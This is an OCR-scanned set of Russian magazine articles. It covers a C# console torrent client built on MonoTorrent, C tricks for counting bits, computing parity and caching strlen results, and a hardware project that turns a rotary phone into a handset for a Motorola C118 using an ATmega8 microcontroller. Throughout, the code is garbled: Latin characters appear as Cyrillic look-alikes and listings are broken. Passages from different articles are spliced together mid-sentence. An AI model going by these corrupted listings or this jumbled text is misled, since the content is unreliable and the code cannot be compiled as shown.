значит, тебе нужно вновь попробовать компильнутьсорцы МопоТоггепГ На 
этот раз компиляция пройдетуспешно. 



Код метода Маіп() 

і Г ( агдз . ЬепдСЪ. < 2) 

{ 

Сопзоіе . МгіСеЫпе ( "Ріеазе гип Йііз ргодгат міСЪ. 
рагатеСегз : " ) ; 

Сопзоіе . ШгіСеЫпе ( "сДоггепС раДІі> <Воѵт1оас1 
1о1с1ег>" ) ; 

Сопзоіе . КеасІКеу ( ) ; 
геСигп; 

} 

_ргодгатРаСЪ. = ЕпѵігопшепД . СиггепСВігесДогу ; 
_СоггепЦРаСІі = агдз [0] ; 

_с!оѵт1оасІРаЦІі = агдз [1] ; 

_ЕазДКезишеРі1е = _ргодгашРаД]і + " \Сешр . сІаСа" ; 

_1ізСепег = пем ТорЮЫзСепег ( 10 ) ; 

Сопзоіе . СапсеІКеуРгезз += 
сІеІедаСе { ехіС ( ) ; } ; 

АррРотаіп . СиггепСВошаіп . РгосеззЕхіС += 
сіеіедаісе { ехіС ( ) ; } ; 

АррЕошаіп . СиггепСВошаіп . ШЬапсІІесІЕхсерЦіоп + = 
сІеІедаСе (окдесД зепсіег, ШЬапсІІесІЕхсерЦіопЕѵепЦ 
Агдз е) { Сопзоіе .МгіДеЫпе (е . ЕхсерСіопОЬд есС ) ; 
ехіД ( ) ; } ; 

Тіігеасі . СеСЕошаіп ( ) . ШЬапсіІесІЕхсерЦіоп + = 
сіеіедаісе (окф есС зепсіег, ИпЬапсІІесІЕхсерЦіопЕѵепЦ 
Агдз е) { Сопзоіе .МгіДеЫпе (е . ЕхсерШопОЬд есС ) ; 
ехіС О; } ; 

(ІоБо^пІоасІ ( ) ; 
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Кодинг в процессе 



Н ДЕЛАЕМ ПРОЕКТ 

Создавай в своей студии новый проекттипа СопзоІеАррІісабоп. Да-да, 
ты не ослышался, сегодня мы будем делать именно консольный торрент- 
клиент. Создал?Теперь потрудись и подключи ксвоему проекту новый 
«Кеіегепсе», расположенный в файле МопоТоггепб .611. Сам файлик 
МопоТоггепб .611 ты можешь найти в папке директория с файлами 
топобоггепб>/Ъіп/беЪид. Если ты пришел к нам из ОеІрЬі и до этого 
никогда не юзал С#и ѴізиаІЗішсІіо.тознайже, что для подключения новой 
Пеіюгепсез (ссылки) необходимо: 1 . Перейти в ЗоІиЕюп Ехріогег (Ѵіеѵѵ -> 
Зоіийоп Ехріогег). 2 . Раскрыть группу Эоіиііоп. 3 . Щелкнуть правой кнопкой 
и выбрать пунктАсИ Пеіегепсе. 4. В появившемся окне (смотри скриншот!) 
перейти на вкладку Ьгоѵѵзе и выбрать файл МопоТоггепбсНІ. 

После выполнения этой нехитрой процедуры тебе ста нут доступны все 
возможности МТ. Теперь можно отвлечься от всяких организационных 
вопросов и приступить непосредственно к кодингу. Первое, с чего должен 
начинаться любой проект — с определения списка необходимых про- 
странств имен. Кимеющемуся списку добавь: 

• МопоТоггепІ.ВЕпсосііпд; //здесь сосредоточена вся работа с ВепСобіпд. 

• МопоТоггепІ.Соттоп; // основные методы. 

• МопоТоггепІ.СІіепІ.Тгаскег; // методы для работы стрекером. 

• МопоТоггепІ.СІіепІ; // клиентские функции. 

Итак, пространства имен подключены, пора переходить косновной части 
и заняться приготовлением фарша для автоматически созданного класса 
Маіп. Перейди в самое начало описания класса и объяви несколько полей: 

//Путь к папке, из которой мы работаем 
з г а с і с збгіпд _рг одгатРабЬ. ; 

//Папка, в которую будем качать 
збабіс збгіпд _боші1аабРабІі; 

//Имя и путь к файлу, который будет содержать служебную 
информацию, необходимую для возобновления закачки 
_базбКезитеРі1е; 

//Путь к торрент - файлу . 

_боггепбРабЪ.; 

//Движок, реализующий функции закачки 



збабіс СІіепбЕпдіпе _епдіпе; 

//Вспомогательный класс 
збабіс ТорІОЬізбепег _1ізбепег; 

//Менеджер для хранения законченных настроек для очеред- 
ного боггепб-файла 
збабіс ТоггепбМападег _тападег; 

Найди метод Маіп ( ) и перепиши в него код из врезки 1 . Пока ты пе- 
реписываешь, я буду комментировать происходящее влистинге. Наше 
приложение будет консольным, а значит, нужно организовать привыч- 
ный для таких приложений интерфейс взаимодействия с пользователем. 
Ты уже наверняка догадался, что речь идет о параметрах, которые мы так 
любим передавать подобным тулзам. Из параметров наша программа 
должна принимать, как минимум, два: путь кторрент-файлу, который 
необходимо закачать, и папку на жестком диске, куда нужно все это 
сохранить. Поскольку мы точно знаем, что параметров будет два, то при 
запуске программы нам нужно убедиться, что так и есть. Именно это я и 
делаю в самой первой строчке. Если «длина» агдз меньше 2, то сооб- 
щим пользователю, что не хватает параметров, и преспокойно прервем 
работу. Успешно получив параметры, я записываю их в соответствующие 
переменные. Помимо этого мне приходится определять путь ктекущей 
директории (папке, из которой работает софтина). В ней мы станем 
сохранять файл бешр . баба, который будет содержать необходимые 
для возобновления закачки сведения. Кому захочется иметь торрент- 
клиент, который не имеет возможности докачивать? Закончив возню с 
переменными, нужно позаботиться о настройке обработчиков событий. 
Это необходимо сделать, чтобы в определенный моментпрограмма, 
например, могла нормально приостановить свою работу и не наделать 
ошибок. В первую очередь позаботимся о корректном завершении на- 
шего приложения и установим делагат для события СапсеІКеуРгезз. 
Оно возникает, если мы попытались прервать работу приложения и 
нажали <СМ+С> в консоли. Поскольку приложениеу нас достаточно не- 
простое, нужно позаботиться о корректном завершении всех запущен- 
ных потоков. Весь коддля правильного прерывания работы определим в 
функции ехіб() (ее код ты можешь посмотреть в моих исходниках). Эту 
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Смотрим информацию оторренте 



Вся информация о закачке — любуйся, сколько хочешь 
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же функцию нужно вызывать во время срабатывания: 

• АррОотаіп.СиггепШотаіп.РгосеззЕхі* (завершения процесса); 

• АррОотаіп.СиггепШотаіп.ІІпЬапсіІесіЕхсерІіоп (необработанного 
исключения). 

Установив обработчики событий, я вызываю процедуру сіоБотопІоасІ ( ) , в 
которой реализована процедура приема файла. Ее код приведен на нашем 
диске. Поэтомутебе ничего не нужно делать, кроме как начать его перепи- 
сывать. Код получился достаточно объемным, но, поверь мне, он был бы еще 
больше (раз в 20), если бы мы писали все вручную и не прибегали бы кпомо- 
щи МопоТоггепІ [Пользуясь случаем , наподдам автору еще пару 
сотен джоулей в качестве компенсации за задержку статьи, 

— Прим. ред.]. Итак, листинг начинается с определения порта для входящих 
подключений. Для своего примера я выбрал порте номером 31 337. Ради 
удобства использования и универсальности, номер порта можно переда- 
вать через параметры. Определив порт, нужно создать экземпляр класса 
ТоггепЕ С ним мы будем выполнять загрузкуторрент-файла и получать 
все необходимые сведения. Вытащить из него можно много чего — далее 
перечислены соответствующие свойства: 

• СгеаІесІВу — автор создания торрент-файла; 

• СгеаІіогЮаІе — дата создания файла; 

• Соттепі — комментарий; 

• АпоипсесІІІгІз — списоканонсов; 

• 5І2е — размер файла(ов) для закачки; 

• РіесеІепдіЬ — размер одной части ; 

• Ріесез.СоипІ — количество частей. 

Если ты читал первую часть статьи, то уже понял, что эта вся та 
информация, над получением которой мы корпели в ОеІрЫ. Ну что 
поделать — здесь нам помогает библиотека, а в Оеірбі приходилось 
работать руками и головой. Проинициализировав объект для работы 
сторрент-файлом, нужно начать подготовку «движка», который будет 
содержать настройки очередной закачки. Но перед тем как перейти к 
движку, подготовим для него набор опций. Для этого я создаю новый 
экземпляр класса ЕпдіпеЗеЕЕіпдз ( ) и заполняю его основные 
свойства: ЗаѵеРаЕЬ. (путь для сохранения файлов) и ЫзЕепРогЕ 
(порт для входящих подключений). Определившись с опциями, я 
начинаю инициализацию самого движка (сііепЕЕпдіпе) и передаю 
ссылку на подготовленные ЕпдіпеЗеЕЕіпдз. Оп-па, я немного 
забежал вперед и совершенно несправедливо обделил вниманием 
создание ТоггепЕзЗеЕЕіпдз. В нихты можешь задать основ- 
ные настройки, которые будут влиять на закачку в плане скорости. 
Например, в моем случае при инициализации переменной типа 
ТоггепіЗеШпдз я передаю следующие параметры: 

1. слоты для отдачи; 

2. количество одновременных соединений; 

3. ограничение скорости на закачку (0 — без ограничений); 

4. ограничение скорости на отдачу (0 — без ограничений). 

На этом с настройками все. Двигаемся дальше. Нам нужно создать 
или прочитать «индексный» файл. Создаем — если он не существует 
и у нас новая закачка. А читают его так: ВЕпсосіесіѴаІие . Весосіе<ВЕ 
псос!есІВісСіопагу> (Еііе . КеасІАІІВуСез (_ЕазЕКезитеЕі1е) . 
Затем я загружаю Іоггепі-файл. Загрузка выполняется методом 



Іоасі ( ) . В качестве одного-единственного параметра он принимает 
путь к файлу. Если во время загрузки возникли ошибки, то сообщим об 
этом пользователю и прервем выполнение программы, нуа если все 
тип -топ, то выведем информацию о загруженном торрент-файле. Вот 
теперь мы подошли к самому интересному — к закачке. Перед тем, как 
зарегистрировать Іоггепі-файл для «движка», нам необходимо опре- 
делиться, будем ли мы продолжать докачку или же начнем лить абсо- 
лютно новый файл. Для новой закачки мы просто создадим торрент- 
менеджер (пето ТоггепШападег (_ЬоггепЕ ,_с!отоп1оас1РаЦ]т, 
_СоггепЕВеб) ;), а вот если закачка уже была запущена, то нужно 
передать наш ДазіВезите. После этого нам ничего не остается 
сделать, как выполнить метод Ведізіег проинициализированного 
«движка». В качестве параметров этому методу передадим ссылку 
на созданный торрент-менеджер. После регистрации на менеджер 
будут действовать все параметры, которые мы установили ранее. Итак, 
уже почти все готово для начала закачки, за исключением одного 
нюанса — обработчиков событий. Их нужно объявить (вспоминаем 
про делегаты!), чтобы получить возможность следитьза состоянием 
процесса закачки. Дабы не париться с расписыванием кода реакций 
на события, я просто взял стандартный шаблон (из дистрибутива МТ) 
и немного подкорректировал. Его кодты найдешь в моем исходнике. 
Сложного в нем ничего нет, и если ты более-менее знаешь С#, то 
проблем не возникнет. Создав соответствующие обработчики, можно 
стартовать закачку — с помощью метода ЗЕагЕ ( ) объекта типа 
ТоггепШападег. Закачка началась, и теперь все, что нам остается 
делать — выводить пользователю соответствующие информационные 
сообщения. Пример такого кода ты найдешь на диске, читай коммен- 
тарий в листинге, чтобы найти куда его писать. 

0 ПОТЕСТИМ? 

Настал частриумфа, — мы должны убедиться, что наши действия не про- 
пали втуне, и наш тор ре нт- клиент действительно сможет выполнить свою 
основную задачу. Попробуй скомпилировать и запустить проект. Не забудь 
при запуске передать соответствующие параметры ! Чтобы убедиться в 
работоспособности нашего детища, я подготовил самый обычныйторрент- 
файл (скачал с ібіе.ги ) и запустил клиентсо следующими параметрами: 
хСоггепС . ехе С : \ЕезЕ . ЕоггепЕ С:\. Через пару секунд я увидел в 
своей консоли информацию оторрент-файлике (рисунок«Вся информация 
о закачке») и предложение начать загрузку. Согласился — и спустя еще 
мгновение мойторрент-клиентуспешно соединился стрекером и присту- 
пил кзакачке. Через минут пять в корне моего диска С: появился соответс- 
твующий файл, а Тоггепі-клиентзавершил свою работу. 

Н ОІБСОМЫЕСТ 

На этой самой ноте, с чувством гордости и выполненного долга, можно 
закончитьсегодняшнее занятие. Надеюсь, что статья тебе понравилась и 
рано или поздноты создашь полноценный тор ре нт- клиент, который заво- 
юет неслыханную популярность и удивит все интернет-сообщество. Удачи 
тебе в начинаниях! Пока! 

Р.5. Есть вопросы?Тогда пиши мне на мыло — я всегда открыт для общения 
и по мере возможности рад помочь. □С 
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^ременные процессоры быстры, как муста 

1 самолет желаний потребите ля. С е го-то динамическ;/ юм^эией крыла, 

с ке^^ н с и р о л ь к<э п н ь^^лго^' м ы , 

переносящие центртяжести со времени выполнения на стадию компиляции. Казалосьбі 



іщи е центртяжести со времени выпол нения на стади 
ну что ту т т а ко го? Просто заполняем таблицу и все! Так ведь нет! Те 
и в насуже летит «Томагавк»! 




Подсчет бит в байте, слове, двойном слове| 



ІСколько битсодержится в байте? Задача нето, чтобы оченьакту- 
, но подсчет битов позволяет продемонстрировать целую серию 
хитрыхтрюков и приемов. Такчто остановимся на проблеме подробнее. 

В лексиконе х86-процессоров имеется множество машинных команд, 
предназначенных для этих целей. Увы, компиляторы их не поддерживают 
(и не собираются]. Аубогий набор битовых операций языков Си/Си++ (в 
которых даже нет инструкции циклического сдвига!) не особо способствует 
созданию быстродействующих программ, вынуждая нас прибегать ктупому 
сканированию со сдвигом по маске. И в результате получается нетребова- 
тельная кпамяти, ноужаснотормозная программатипа вот этой: 

ПОДСЧЕТ КОЛИЧЕСТВА БАЙТ В РЕЖИМЕ РЕАЛЬНОГО ВРЕМЕНИ 

з1оѵу_ЬіЦз_іп_ЬуЦе (ипзідпесі скаг ЬуСе) { 
іпЬ а, шазк, зшп; 



01 



альная 



Естественно, рассчитывать таблицы вручную мы не будем. Все делается 
с помощью компьютера, набросавши вспомогательную программу изде- 
сятка строк (западные программисты называют их «хэлперами» — Гіеірег, 
англ, «помощник»]: 

НЕЬРЕР ДЛЯ ГЕНЕРАЦИИ ПРЕДВЫЧИСЛЕННОЙ 

ТАБЛИЦЫ БЫСТРОГО ПОДСЧЕТА КОЛИЧЕСТВА БИТОВ В БАЙТЕ 

іпС а, Ь, зшп, шазк; 

ргіпкТ ( " іпк шакгіх [ ] = { 0 " ) ; 

Нот (а=1; а <0x100; а++ , ргіпкі ( " , \к%х" , зшп)) 

Тог (Ь = 0 , шазк = 1 , зшп = 0 ; Ь < 8 ; Ъ++ , шазк «= 1 ) 
і! (а & шазк) зшп++; ргіпкі ( " } ; \п" ) ; 

ПРЕДВЫЧИСЛЕННАЯ ТАБЛИЦА 

ДЛЯ ПОДСЧЕТА КОЛИЧЕСТВА БИТ В БАЙТЕ 



Тог (а = 0, шазк = 1, зшп =0; а < 8; а++, шазк «= 1) 

іТ (Ъуке & шазк) зиш++; гекигп зшп; 

} 

Для подсчета количества битов в слове и двойном слове достаточно 
заменить (а < 8] на (а < 16] и (а < 32], соответственно. Работать это будет, но 
на скорость можно не рассчитывать (особенно, в случае двойного слова]. 
Задумаемся, какможно оптимизировать алгоритм. 

Подсказка: один байт вмещает в себя всего лишь 256 комбинаций бит. 
Значит, можно без зазрения совести загнать их в предвычисленную 
таблицу, которая представляет собой массивтипа сбаг, проиндексиро- 
ванный значениями байт и хранящий количество бит. В таком случае, 
наши расходы составят 256 байт оперативной памяти и одну операцию 
обращения к памяти для чтения содержимого ячейки. Ксожалению, 
х86-процессоры не очень приспособлены для работы с байтами. Доступ 
кдвойным словам происходитощутимо быстрее, а потому имеетсмысл 
использовать массив из двойных слов. Тогда потребление памяти 
увеличится до 1 Кб. В кэш первого уровня это по-прежнему свободно 
вмещается. 



ІПС таЬгіх [ ] = |#, іЩі 2, 1, 2, 2, ЗуІ, 2, 2, 3, 2, 3, 3, 4, 1, 2, 2, 3, 2, 3, 3, 
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Сама функция подсчета биттривиальна и укладывается буквально 
в несколько символов (рекомендуется оформить ее для сокращения 
накладных расходов в виде макроса или использовать директиву 
іпііпе, в надежде, что ее не проигнорирует компилятор): 

ШУСТРАЯ ФУНКЦИЯ ПОДСЧЕТА КОЛИЧЕСТВА БИТ В БАЙТЕ 

Ъікз_іп_Ъуке ( ігШ Ьуке) { геСигп шакгіх[Ьуке & ОхРР] ; } 
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^ согііпд 



О К, с подсчетом бит в байте мы разобрались. На очереди слово, а за 
ним и двойное слово. Еще пара таблиц? Ага, какже. Разбежались! 
Количество битовых комбинаций в словеуже достигает 65536, что даже 
при использовании байтового массива вылетает в 64 Кб памяти. Это 
уже не умещается в кэш-памяти первого уровня и потому существен- 
но проигрывает изначальному варианту, приведенному выше. А на 
двойное слово вообще никакой памяти не хватит, разве что запускать 
программу на 64-битных операционных системах, но как тогда считать 
биты в четвертом слове? 

Стоп! Что такое слово? Это же два байта! А функция подсчета количества 



03 Хитрый вывод инварианта из цикла 



(Рассмотрим классический цикл, в заголовке которого присутствует неяв- 
ный инвариант(например, функция зігіеп): 

Іог (а = 0 ; а < зігіеп ( з ) ; а+ + ) зшп += з [а] ; 

Программисту понятно, что функция зігіеп не изменяет длину строки 5, 

— не изменяет ее и тело цикла. А потому в каждом проходе зігіеп будет 
возвращать один и тотже результат. Оптимизирующий компилятор, по 
идее, должен вынести ее за пределы цикла, вычисляя длину строки всего 



битов в байте у нас уже есть. Так почему бы не передать ей сначала старший один раз. Увы! Подавляющее большинство компиляторов компилирует 



байт, а затем — младший и не сложить полученные результаты? Аналогич- 
но дела обстоятс двойным словом и четверным (восьмерным]. Короче, мы 
получаем следующий набор функций: 

ФУНКЦИИ ПОДСЧЕТА КОЛИЧЕСТВА БИТ В СЛОВЕ И ДВОЙНОМ СЛОВЕ 

ЬІЦЗ_ІП_Ѵ\ГОГСІ ( ІпС ТлГОГСІ) 



геСигп МСз_іп_ЬуЦе Ыогд. & ОхРР) + 
ЬіСз_іп_Ьу1іе ( Ыогсі » 8) & ОхРР) 



функции по раздельности, а согласно Стандарту, переменная, переданная 
по ссылке, можетбыть изменена вызываемой функцией. Следовательно, 
компилятор оставляет функцию внутри цикла, во много раззамедляя его 
выполнение (особенно на длинных строках]. Исключение составляют про- 
двинутые компиляторы типа Іп1:еІС++. В режиме максимальной оптимиза- 
ции они все-таки распознают небольшое число популярных библиотечных 
функций. Но кфункциям, написанным самим программистом, это не 
относится. 

Учебники пооптимизации рекомендуют переписать этот цикл так: 



КЛАССИЧЕСКИЙ ОПТИМИЗИРОВАННЫЙ ВАРИАНТ 



ЪіСз_іп_с1ѵ\гагс1 ( іпС бжэгсі) 

{ 

геСигп ЬіСз_іп_ѵ\гогс1 (сіѵгогсі & ОхРРРР) + 
ЬіДз_іп_Ѵ\ЮГСІ ( (сіѵгогсі » 0x10) & ОхРРРР) ; 

} 



Но перед нами вовсе не предел оптимизации. Поразмыслив, от функции 
ЬіІ5_іп_ѵѵогсі можно легко отказаться, поскольку расширить слово до 
двойного — не проблема. Процессор сделает это всего за один такт и даже 
не хрюкнет. 

Кому-то задача подсчета битв байте может показаться слишком надуман- 
ной и не имеющей практического применения. Однако, это нетак, и тотже 
самый алгоритм, например, успешно используется для подсчета контроль- 
ной суммы. Кстати, о контрольной сумме... 



[ГСТШШИВБ 

Простейший алгоритм проверки целостности данных сводится 
к контролю четности, то есть подсчету количества бит и его дополнению 
до четного (или нечетного] состояния. Естественно, таким способом га- 
рантированно можно обнаружить только одиночные ошибки, но это уже 
тема другого разговора. Поставим перед собой задачу — реализовать 
этоталгоритм с максимальной эффективностью. Что ж, вполне очевид- 
ное решение: сгенерировать таблицу четности для каждого байта, а 
затем обрабатывать потокданных произвольного размера — хоть целый 
гигабайт! Однако у нас уже есть та кая таблица. 

Ну, или почти такая. От количества битв байте до подсчета четности, как 
говорится, хвостом подать; всего-то и надо, что проверить младший бит 
— если он равен единице, то количество битв байте нечетно и, соот- 
ветственно, наоборот. Операция наложения битовой маски оператором 
АЫЭ требует времени (приблизительно один процессорный такт], но 
это все же лучше, чем плодить предвычисленные та блицы в огромном 
количестве. 

Короче, законченный пример реализации выглядит так: 



рагіСу(іпЦ ЬуСе) {геСигп ! (ЬіСз_іп_с1лгогс1 (ЬуСе) & 1) ;} 



Іог (а = 0 , Іеп = зігіеп (з) ; а < Іеп; а++) 

зигп += з [а] ; 

Идея, конечно, хорошая, но большинство программистов о ней незнает.А 
какбыть, если мы разрабатываем высокопроизводительную библиотеку, 
которую будет использовать совсем другой «тим»? Одно из возможных 
решений заключается в... сохранении вычисленного значения внутри 
функции! 

ОПТИМИЗИРОВАННАЯ ФУНКЦИЯ ПОДСЧЕТА ДЛИНЫ СТРОКИ С АВТО- 
СОХРАНЕНИЕМ ПОСЛЕДНЕГО ВОЗРАЩЕННОГО РЕЗУЛЬТАТА 

зирег_зСг1еп (сііаг *з) 

{ 

зСаСіс сЬаг *р; зСаСіс геС_ас!с1г; зСаСіс Іеп; 

II ( (з == р) & (геС_ас1с1г == ( * ( іпС* ) &з + зІ 2 ео! ( з ) ) ) ) ) 
геСигп Іеп; 

р = з; геЦ_аскіг = (* (іпС*) (&з+ ігеоі (з) ) ) ; 

Іеп = зігіеп(з) ; геСигп Іеп; 

} 

Это не предел оптимизации, зато код нагляден и понятен. В чем суть? А в 
том, что 5ирег_5ІгІеп сохраняетуказатель на строку и адрес возврата в 
статических переменных и, если при последующем вызове они совпадают, 
функция считает, что она вызывается в заголовке цикла и возвращает 
заранее вычисленный результат, экономя кучу процессорныхтактов. 

Такое поведение не совсем безопасно, так как все экземпляры функции, 
вызываемые из различных потоков, разделяют одни и те же статичес- 
кие переменные. Ну это, собственно, не проблема. На этоу нас есть 
локальная память потока (онажеТЕЭ]. Настоящая проблема втом, что 
если тело цикла модифицирует строку, изменяя ее дли ну, то програм- 
мист получит весьма неожиданное поведение. С другой стороны, при 
использовании оптимизирующих компиляторов, выносящих зігіеп за 
пределы цикла — программист получиттотже самый результат. 

А потому, кто изменяет длину строки внутри цикла — тот сам себя и 
наказал! ПС 
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іелиться из толпы, все обернется тем, что толпа станет поголовно ходить, 
|с модной штукоі^очёш'ь по-настоящёму соответствовать Джоосвоскомі 
иле ге п *»По гд а за оё и на іРпогіе и делай, как я! 




В ТРУБА МЕЧТЫ 

У настоящего сурового гика должен быть реально злобный сотовый 
телефон, способный только одним своим видом вызывать взрыв мозга 
у окружающих. Поэтому лезь на антресоль и доставай оттуда старый 
дисковый агрегат, доставшийся тебе от бабушки. Сейчас мы сделаем 
емутотальный апгрейд и вернем вечную молодость. Если утебя такого 
девайса не осталось, то потряси друзей, соседей и прочих несознатель- 
ных личностей, которые согласятся расстаться с этой шайтан-машиной 
( Рекомендую поискать на молотке, — Прим. ред. ) . Главное, не говори 
им истинных целей, а то зажмотят и себе сделают. Постарайся найти 
телефон подревнее и пострашнее. В идеале, с эбонитовым корпусом и 
прямым проводом до трубки (в «Матрице»такой был]. Эти агрегаты про- 
изводились в 50-60 гг, такчто«антуражности» им не занимать. Эстеты 
и извращенцы могут повесить таксофон за спину. Заодно и рюкзак не 
потребуется :). 

Н СКРЕЩИВАЕМ ЕЖА С УЖОМ 

Конечно, мотаться по мегаполису, разматывая за собой многокиломет- 
ровую бобину провода — это круто итрешево, но такого уровня про- 
светления не достиг даже я. Поэтому и реализацию предлагаю более 
простую. 



Чтобы одним только видом внушать страх и ужас окружающим, будем 
интегрировать в сотовую сеть найденныйтобой в загашнике дисковый 
телефон. Проще всего это сделать посредством обычного мобильного 
телефона, который мы радостно принесем в жертву. 

С выбором агрегата на разделку есть два варианта: первый — купить 
какой-нибудь Зіетепз и зарубиться к нему по порту (даже переделка 
почти не потребуется]. Об этом методе доступа ктелефону я написал уже 
две статьи, поэтому повторяться не буду. Да и с развалом мобильного 
подразделения Эіетепз эти телефоны постепенно исчезают из обра- 
щения. Поэтому будем делать девайс на подручном материале. Возьмем 
какую-нибудь отсталую мобилку, вроде Моіюгоіа С 1 1 8 и выпотрошим ее 
как следует, а затем скрестим с дисковым собратом. 

Для начала надо прикинуть фронт работ. Каквидишь.у настутодна 
проблема: у совкового телефона — диск, а на сотовом кнопки, поэтому 
напрямую подключиться никак. Придется городить переходник. 

Была задумка по-быстрому сработать что-нибудь на дискретных микро- 
схемах-счетчиках. Но позже, поразмыслив, я закинул эту идею подаль- 
ше. Тут одной микросхемойточно не обойдешься, и схема получается 
громоздкой. 

Куда проще и эффективней сделать все на микроконтроллере. Такчто, 
бегом в радиомагазин. Рекомендую АТтеда8 — полюбилась мне она. 
Также подойдет АТтеда48, АТтеда88 или АТтеда168 — модификации 
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старой доброй «восьмерки» различаются только количеством наворотов 
и объемами памяти. Программка у нас будет небольшая, поэтому хватит 
любого объема памяти. 

г ПОТРОШИМ ДЕДУШКУ 

Вскрываем дисковый телефон и смотрим, какой устроен. В первую 
очередь нас интересуютдиск и контакты, которые отвечаютза снятие и 
подъем трубки. Все остальное можно смело отковырять и выкинуть, дабы 
не оттягивало руку. 

Клеммники могут пригодиться, поэтому просто отрежь от них дорожки. 
Теперь возьми тестер, переключи его в режим пищалки и прозвони 
контакты трубки. Нужно найти те, которые размыкаются при съеметрубки 
с рычага. У меня они засунуты в прозрачный корпус: даже тестер не 
потребовался — и так все было видно. 

Открути провода диска от клеммника и разберись, какой из нихза что 
отвечает. Можешь аккуратно разобрать сам дисковый механизм. По- 
хорошему, из диска должно выходитьтри или четыре провода (в случае 
трех проводов — один общий]. В самом диске два контакта. Один из них 
всегда замкнут и при вращении диска кратко размыкается. Крутанул 
цифру «1 » — разомкнулся один раз. Крутанул «5» — разомкнулся пять 
раз. Ну, а если крутанешь «ноль», то контакт отработает десять размыка- 
ний. Для краткости буду называть его конта кт «А». Второй контакт всегда 
разомкнут и замыкается только тогда, когда проворачивается диск. Его 
обзовем контакт «Б». 

На этих контактах мы построим систему подсчета набранного номера. 
Алгоритм работы проги будет следующим. При снятии трубки счетная 
схема включается и ждет поворотов диска. При повороте замыкается 
«Б», и микроконтроллер подсчитывает щелчки контакта «А». Кактолько 
контакт«Б» разомкнется, то считаем, что одна цифра набрана — мож- 
но ждать следующей. Чтобы определить, что номер набран, мы будем 
использовать простой цикл ожидания. 

Подсчитывать количество цифр нецелесообразно, так как номера могут 
быть разной длины. Самоето — считать, что номер набран и можно 
звонить по прошествии двадцати секунд с набора последней цифры. 
Впрочем, двадцать секунд — это я навскидку сказал, можно сделать 
столько, сколько тебе нужно для комфортного набора без спешки. 

Пока неясен вопрос подключения схемы к сотовому телефону, но это мы 
сейчас поправим. Впрочем, всегда остается варианте подключением како- 
го-нибудь Сименса через дата-кабель, о котором я уже неоднократно писал. 

Н ВСКРЫВАЕМ МОБИЛУ 

Для набора номера мы будем симулировать нажатия кнопок. Поэтому 
под наши грязные цели сгодится абсолютно любая мобила — лишь бы 
были кнопки. 



Чтобы понять, как нам провернуть эту хитрую операцию, надо влезть во 
чрево сотового телефона. Лично я взял самый стремный сотовый, какой 
смогнайти в своихзавалах — Моіюгоіа С118. 

Аккуратно выкручиваю винтики и отжимаю защелки верхней крышки. 
Глазам предстают ровные ряды контактных площадокот кнопочек. 

Сами кнопки — это кольцевые контакты с пятачками внутри. Поверх них 
наклеивается на обычный скотч упругая чашечка. Когда кнопка давит 
на чашку, то чашка прогибается и замыкает пятачок на кольцо — вот и 
готово нажатие кнопки! 

Нам нужно десять кнопок цифр, одна кнопка вызова абонента и одна 
кнопка сброса — итого одиннадцать кнопок. 

Замыкать кнопки лучше всего через оптореле. Оптореле — это такая 
микросхемка, внутри которой находится светодиод и фототранзистор. 
Если зажигается светодиод, то сопротивление фототранзистора резко 
падает, что можно сравнить с нажатием кнопки. 

Используя оптроны, мы, во-первых, изолируем нашу схему с конт- 
роллером от схемы сотового телефона, которая работает на пони- 
женном напряжении, а во-вторых, избавляемся от кучи паразитных 
связей, которые могут возникнуть в телефоне с подключением кон- 
троллера. А значит, сильно повышаем надежность за счет того, что 
сигнал от одной части оптрона кдругой передается в виде обычного 
света, а не в виде электрических импульсов. Без оптических раз- 
вязок телефон начинает резко тупить, самопроизвольно набирать 
цифры и звонить куда попало — сказываются наводки на схему, так 
как кнопки не предназначены для припаивания к ним проводов и 
реагируют на любой радиочастотный мусор, что болтается в эфире. 
Короче, оптроны — это проверенное временем промышленное 
решение. 

Когда пойдешь покупать оптроны, можешь взять любое маломощное 
твердотельное реле. Например, я сделал на СРС1035ІМ. Другой вариант 
— отыщи уже знакомые тебе по статьям оптореле КА0У2Ю или КАОУ214. 
Правда, эти оптореле стоят подороже, чем СРС1035ІМ, а их нужно целых 
13 штук. Но зато к ним не надо припаивать кусочки проволоки, чтобы 
впаять их на йІР-место. 

Чтобы добраться до контактных пластинок, тебе потребуется акку- 
ратно оторвать прозрачную пленку с пластинками. Если планируешь 
вернуть телефону прежнюю жизнь, то сохрани ее где-нибудь в ук- 
ромном месте. Я налепил ее на заднюю стенку крышки аккумулятора, 
чтобы не потерялась. 

Теперь хватай мультиметр, включай его в режим тестера- пищалки и 
начинай прозванивать клавиатурную матрицу. Дело втом, что клавиши 
сгруппированы по несколько штук, а значит, необязательно от каждой 
тащить до оптореле по два провода. Достаточно одного общего и не- 
скольких центральных — это резко сокращает число проводков. 
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У моей «моторолы» общий вывод был для клавиш 3-6-9, 1 -4-7, 0-8-5-2. 
Впрочем, еслиты нехочешьзаморачиваться.тотупо припаивай ккаж- 
дой кнопке по два проводка итащи их кзамыкающим выводам оптрона. 
Чтобы не запутаться, сразу же подпиши на бумажке, какой проводоку 
тебя к чему идет и какая релюшка к какой ножке процессора подпаяна. А в 
программе, в разделе сіебпе.азт, расставьпо портам, так кактебе нужно. 



г ПОДКЛЮЧАЕМСЯ КТЕЛУ 

Разогревай паяльник и зачищай проводки. Тебе потребуется паяльник 
с тонким жалом, поэтому старое дедушкино стоваттное лудило спрячь 
обратно под ванну. Разужначал баловаться радиоэлектроникой, то 
обзаведись радиомонтажным паяльником на 25-40 ватт. Смажь каждую 
контактную пластинку небольшим количеством флюса и, взяв на кончик 
жала небольшую каплю припоя, припаивай проводки. Паяться будет 
плохо, предупреждаю сразу. Причинтутдве: во-первых, позолоченное 
покрытие кнопокочень стремно паяется, а во-вторых, под кнопками рас- 
полагается сплошной медный слой. В сотовом телефоне он служитэк- 
раном, защищая начинку от помех из вне. При пайке эта мощная медная 
прослойка будет очень быстро оттягивать на себя тепло, охлаждая спай. 
Лучшая технология пайки таких проблемныхустройств — всезаранее 
подготовить, нанести флюс, подставить проводок, а потом одним хоро- 
шим касанием пришпандоритьсоплей припоя. Главное, следи, чтобы 
не спаялись вместе соседние площадки — земля и сигнальная, иначе 
кнопка будет вечно нажатой. После пайки возьми кисточку и спиртом 
или ацетоном смой остатки флюса с кнопок. 

Вывел проводки от кнопок? Отлично, обрежь их на длину сантиметров в 
десять. Больше не надо, чревато помехами. Меньше — можно, но припа- 
ивать их на плату будет неудобно. 



поэтому подключаем их катодами на минус, а анод, через резистор, заво- 
дим прямо на ножки порта. 

О пришедшем звонке можноузнать по излюбленной мнойтехнологии 
— повесить на виброзвонокоптрон, который замкнет конта ктпри вхо- 
